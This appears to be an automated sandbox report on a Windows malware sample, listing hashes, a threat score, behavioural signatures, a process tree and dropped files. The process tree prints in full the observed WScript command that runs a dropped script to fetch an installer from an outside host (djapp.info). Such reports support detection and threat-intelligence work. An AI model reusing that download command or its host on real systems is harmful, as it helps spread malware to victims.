2bb3b27d40bd8db4533c4ad03aa4bd1d7ad78a7190a076feceed93f15fc9d4f6

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/04/2024, 01:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe
Size

184KB
MD5

041b781fef995066fdce0a391bdbc44f
SHA1

8857f2f98a16dbe7e83f156d562b26c92ea82aa2
SHA256

2bb3b27d40bd8db4533c4ad03aa4bd1d7ad78a7190a076feceed93f15fc9d4f6
SHA512

3170993f3cfc4882479cd8c51688ee141121fa3d666a99d2398faca8062170b14cdb936144b0ec0e6aa6f92172f83cc3ce3c87876cb6aae1d01dfefc768da124
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO34:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2700	WScript.exe
8	2700	WScript.exe
10	2700	WScript.exe
12	1988	WScript.exe
13	1988	WScript.exe
15	1548	WScript.exe
16	1548	WScript.exe
18	1796	WScript.exe
19	1796	WScript.exe
21	2096	WScript.exe
22	2096	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2744 wrote to memory of 2700	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	28
PID 2744 wrote to memory of 2700	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	28
PID 2744 wrote to memory of 2700	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	28
PID 2744 wrote to memory of 2700	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	28
PID 2744 wrote to memory of 1988	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	31
PID 2744 wrote to memory of 1988	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	31
PID 2744 wrote to memory of 1988	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	31
PID 2744 wrote to memory of 1988	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	31
PID 2744 wrote to memory of 1548	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	33
PID 2744 wrote to memory of 1548	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	33
PID 2744 wrote to memory of 1548	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	33
PID 2744 wrote to memory of 1548	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	33
PID 2744 wrote to memory of 1796	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	35
PID 2744 wrote to memory of 1796	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	35
PID 2744 wrote to memory of 1796	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	35
PID 2744 wrote to memory of 1796	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	35
PID 2744 wrote to memory of 2096	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	39
PID 2744 wrote to memory of 2096	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	39
PID 2744 wrote to memory of 2096	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	39
PID 2744 wrote to memory of 2096	2744	041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\041b781fef995066fdce0a391bdbc44f_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf77AF.js" http://www.djapp.info/?domain=XkyduaHtPs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf77AF.exe
  2⤵
  - Blocklisted process makes network request
  PID:2700
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf77AF.js" http://www.djapp.info/?domain=XkyduaHtPs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf77AF.exe
  2⤵
  - Blocklisted process makes network request
  PID:1988
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf77AF.js" http://www.djapp.info/?domain=XkyduaHtPs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf77AF.exe
  2⤵
  - Blocklisted process makes network request
  PID:1548
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf77AF.js" http://www.djapp.info/?domain=XkyduaHtPs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf77AF.exe
  2⤵
  - Blocklisted process makes network request
  PID:1796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf77AF.js" http://www.djapp.info/?domain=XkyduaHtPs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGL C:\Users\Admin\AppData\Local\Temp\fuf77AF.exe
  2⤵
  - Blocklisted process makes network request
  PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
23c3647724cc7d7f2fd92c7d36600f25

SHA1
11db3eca57631a679c174dfa364802fc6e841076

SHA256
b470d6bb0e33983041874f283d681bd6352325618a8b3b4c85321a8749f369b7

SHA512
aceddffd0cfa38e431910877804b7788bb34f4dd544d2691e4a2219c9ff59796c9f31c42b66f195b66ba6f33cd84fde7b7a04a053e8acc135531ccfffb3c41eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
f8a1948cd2902bab9f2d23f8f7e98a72

SHA1
6f2a11d47a74038dcce25c1acba1586719f4df86

SHA256
2b74b27f99dbc4ca5fe81eacf0a0909a2404751dcf6e9f52741abcc7d2add3c9

SHA512
45cbbca6ecf67466803c29c3fc7255054a171791448f97a367816b91ddf09487443f9b7c062dbc91d968bbe5513e191ab42640a5afcd023278393c9798f935f6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a98da8d21b64a410b37c5770bf9001fb

SHA1
514b1ae13d1997f0e6827fd8239353c630b3d1cd

SHA256
ab7726004568a6770270800205ba5706c9791681cef6e22eb99994c8d1b9fbf9

SHA512
d90ca494649b90e3a76fa25080b0190023bf1e09eebda2a9eb02f6c8428088f6b2bb7182941296df2a2663fbbe0573b3949d645b6763f168a29aff6a9f8713ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
b0e0e01b4c4256c5b629e5ccd86066c5

SHA1
cd313ebfa31ec2dde4d1cf5098ae3e0e6e8752cb

SHA256
8b646cec4a5010a7aa6c74594e110fa3528b21bbab76dff9168f807066a1951f

SHA512
dea6fe0fdf0c1fc854994fdeb2c77ca445f776bdeeda3c163d3996bfde156115734c07102f27c6cddf5b6333102bdde93977d3e631833e95e97dc572d39b5d8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
5ffc8ad028955060c7b61c6dd8570f7c

SHA1
afe2caef51fa0a2857dc251ff3d2bf99075a4de7

SHA256
d004e6c97edc702b4c014cb16b80b789bcdcc0ed1e75775092485604543458e8

SHA512
ece01ba0e7831c41d71e5f224371fad088c7d4cb85c666cbb780c74f295e6a021b3b4495557119a96144e30943c4a881f6d0ef56634c3bc968002d8424ca67f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
40KB

MD5
df9cfb30f0ce05631f78ae32cc94cbe9

SHA1
4925dcc4005e1b05e6a16f6b15e5526bc5de5b4e

SHA256
24cef689027b138806fd61ddd09d70e6149ba5e18afb79bf32da3244efa6421a

SHA512
1ef8041acca60011d0ce9dee62027e1cbaa1b10b55083973aedffde0ff27fe5ad73ca415e8b71b5a4bf4ad60605ee66d5c69af0498298aa89bd9c97e9352133a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
3576bb6bace959de2a97ca211ee66222

SHA1
7d42256a6fcdf951ce477b6d5af192cc0f40a1f0

SHA256
b1a8a0aaabeb717ca2aef3270bf7e72469107e0f1f7d9be32f7acf826e29a41a

SHA512
ac574b61de2b1becbaa5d7cee4fff7482d2715fe480b273ed96432ca4dfd32a456d166fd1a6fead0168bc22679ef8cbcb8b62ebd4ad0f00a27455e96db080f5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
40KB

MD5
7b1d7023e76367282a469a2ddf88736e

SHA1
6bbd5042767755855494cf38b9afdf7bd190fc54

SHA256
108bfc46d0905d0fefa87b567e996287c1a7d7e4d8fcf75fc488ea0a793b5edd

SHA512
bf1558954bbc235ced11278eb027c36396f4f84a894fc88023ca7cf4c528786c77594a6a28eb9bb748860c9553d7913f978551f94cccfce2724d4978882481f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBF0B.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD54A.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf77AF.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CHU42Y3Z.txt

Filesize
177B

MD5
28c15fe2b4583070a404c8c062d9260e

SHA1
07cd17b4d5e9ac20aa2e49a4800e5a3aaea7cc07

SHA256
cdcf78db5346a20062c8ce0d614fa74f7857a4957450d62763ba304bd78c9fd9

SHA512
20f524d14ab58a63dfcecf8978c778d970d5671eb1af38304fb2e63f59de576ea38267ef9fe9941e2c59bd3e7394d218848807ab84d9fb04b0530cb06e54bf5d

Download Submit